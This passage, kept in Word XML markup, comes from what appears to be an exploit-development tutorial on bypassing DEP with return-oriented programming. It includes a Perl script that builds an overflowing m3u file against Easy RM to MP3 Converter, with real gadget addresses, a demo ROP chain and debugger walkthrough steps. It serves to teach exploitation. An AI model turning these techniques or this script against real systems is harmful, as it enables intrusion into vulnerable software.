        <w:t>So we will create a ROP chain that will use the VirtualProtect() function (kernel32.dll) to change the access protection level of the memory page where the shellcode is located, so it can get executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In order to make that work, we will need to pass a number of parameters to this function. These parameters need to sit at the top of the stack </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>at the time</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> the function gets called.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>There are a few ways to do this.  We can put the required values in registers and then issue a pushad (which will put everything on the stack in one time). A second technique would be to put some of the parameters (the static ones/the ones without null bytes) on the stack already, and use some ROP gadgets to calculate the other parameters and write them onto the stack (using some kind of sniper technique).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We cannot use null bytes in the m3u file, because Easy RM to MP3 Converter would treat the data in the file as a string, and the string would get terminated at the first null byte.  We also need to keep in mind that we’ll most likely end up with some character set limitations (we’ll simply create encoded shellcode to overcome this issue)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enough small talk, let’s get started.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="chainingbasics"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr/>
        <w:t>How to build the chain (chaining basics)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to bypass DEP, we will need to build a chain of existing instructions.  Instructions which can be found in all modules (as long as they’re executable, have a static address and don’t contain null bytes then it should be fine).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Basically, since you will need to put data on the stack (parameters to a function that will bypass DEP), you will be looking for instructions that will allow you to modify registers, push and pop data to and from the stack and so on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Each of those instructions will – somehow – need to "jump" to the next instruction (or set of instructions) you want to execute.  The easiest way to do this, is by making sure the instruction is followed by a RET instruction. The RET instruction will pick up the next address from the stack and jump to it. (After all, we start our chain from the stack, so the RET will return to the caller (the stack  in our case) and take the next address). So basically, in our chain, we will be picking up addresses from the stack and jump to them. The instructions at those addresses can pick up data from the stack (so these bytes have to be placed in the right place of course).  The combination of those two will form our rop chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Each "instruction+RET" is called a "ROP gadget".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This means that, in between pointers (pointers to instructions), you can put data that can get picked up by one of the instructions. At the same time, you will need to evaluate what the instructions will do and how that will impact the spacing you need to introduce between 2 pointers on the stack.  If an instruction performs ADD ESP,8, then this will shift the stack pointer, and that will have an impact on where the next pointer must be placed. This is required so the RET at the end of a gadget would return to the pointer of the next instruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>I guess it is becoming clear that your ROP routine will most likely consume a good amount of bytes on the stack.  So the available buffer space for your rop routine will be important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If all of this sounds complicated, then don’t worry. I’ll use a little example to make things clear :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Let’s say, as part of our ROP routine, we need to take a value from the stack, put it in EAX, and increase it with 0x80. In other words :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">we need to find a pointer to POP EAX + RET and put it on the stack (gadget 1) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">the value that must be placed into EAX must be placed right below the pointer </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">we need to find another pointer (to ADD EAX,80 + RET) and place it right below the value that is popped into the stack  (gadget 2) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">we need to jump to the first gadget (pointer to POP EAX+RET) to kick off the chain </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We will talk about finding rop pointers in a few minutes. For now, I’ll just give you the pointers :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>10026D56  : POP EAX + RET : gadget 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1002DC24 : ADD EAX,80 + POP EBX + RET : gadget 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(the second pointer will also execute POP EBX.  This will not break our chain, but it will have an impact on ESP and the padding that needs to be used for the next rop gadget, so we have to insert some "padding" to compensate for that)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, if we want to execute those 2 instructions after each other, and end up with our desired value in eax, then the stack would be set up like this :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1920"/>
        <w:gridCol w:w="2029"/>
        <w:gridCol w:w="5689"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1920"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2029"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Stack address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5689"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Stack value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1920"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ESP points here -&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029"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0010F730</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5689"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10026D56 (pointer to POP EAX + RET)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1920"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2029"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0010F734</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5689"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50505050 (this will be popped into EAX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1920"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2029"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0010F738</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5689"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1002DC24 (pointer to ADD EAX,80  + POP EBX + RET)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1920"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2029"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0010F73C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5689"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DEADBEEF (this will be popped into EBX, padding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, first, we will need to make sure 0x10026D56 gets executed. We are at the beginning of our sploit, so we just have to make EIP point to a RET instruction.  Find a pointer that points to RET in one of the loaded modules and put that address into EIP. We will use 0x100102DC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When EIP is overwritten with a pointer to RET, it will obviously jump to that RET instruction. The RET instruction will return to the stack, taking the value at ESP (0x10026D56) and jump to it.  That will execute POP EAX and will put 50505050 into EAX.  The RET after POP EAX (at 0x10026D57) will jump to the address that is at ESP at this time. This will be 0x1002DC24 (because 50505050 was popped into eax first).  0x1002DC24 is the pointer to ADD EAX,80 + POP EBX + RET, so that next gadget will add 0x80 to 50505050.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Our example sploit will look like this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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x100102DC);  #pointer to RET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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate, to make sure ESP points at first rop gadget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$rop = pack('V',0x10026D56);       #POP EAX + RET (gadget 1)</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 = $rop . pack('V',0x50505050);   #this will be popped into EAX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 = $rop . pack('V',0x1002DC24);   #ADD EAX,80 + POP EBX + RET (gadget 2)</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 = $rop . pack('V',0xDEADBEEF);   #this will be popped into EBX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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 1000;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$payload = $junk.$eip.$junk2.$rop.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attach the debugger to the application and set a breakpoint on 0x100102DC.  Run the application and load the m3u file. The breakpoint should get hit :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6096000" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Image12" descr="">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a:hlinkClick r:id="rId62"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the breakpoint gets hit, EIP points at our RETN instruction. You can see in the small window below the CPU view that this RET instruction will return to 0x10026D56 (which sits at the top of the stack, the location where ESP point at)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If we now step through, one instruction at a time (F7), this is what happens :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RETN : EIP jumps to 0x10026D56, ESP moves to 0010F734 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">POP EAX : This will take 50505050 from the stack and place it into EAX. ESP moves to 0010F738 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RETN : This will put 1002DC24 into EIP and moves ESP to 0010F73C </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ADD EAX,80 : This will add 0x80 to 50505050 (EAX) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">POP EBX : This will put DEADBEEF into EBX and will increase ESP with 4 bytes again (to 0010F740) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RETN : This will take the next pointer from the stack and jump to it (43434343 in this example) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Right before the last RETN is executed, we should see this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Image13" descr="">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a:hlinkClick r:id="rId64"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="2390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As you can see, we have been able to execute instructions and craft values in registers, without executing a single opcode directly from the stack. We have chained existing instructions to each other, which is the essence of ROP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Make sure you understand the concept of chaining before continuing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="gadgets"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr/>
        <w:t>Finding ROP gadgets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A few moments ago, I have explained the basics of ROP chains. In essence you will need to find instructions/instruction sequences that are followed by a RET instruction (RETN, RETN 4, RETN 8 and so on), which will allow you to "jump" to the next sequence/gadget.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>There are 2 approaches to finding gadgets that will help you building the ROP chain :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You can specifically search for instructions and see if they are followed by a RET.  The instructions between the one you are looking for, and the RET instruction (which will end the gadget) should not break the gadget. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You can look for all RET instructions and then walk back, see if the previous instructions include the instruction you are looking for. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In both cases, you can use the debugger to search for instructions, search for RET, etc. Manually searching these instructions, however, may be very time consuming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Furthermore, if you use the "list all ret’s and look back" approach (which will produce more results at once and give you more accurate results), you may have to do some opcode splitting to find additional gadgets (that will end with the same ret).</w:t>
      </w:r>
    </w:p>
    <w:p>
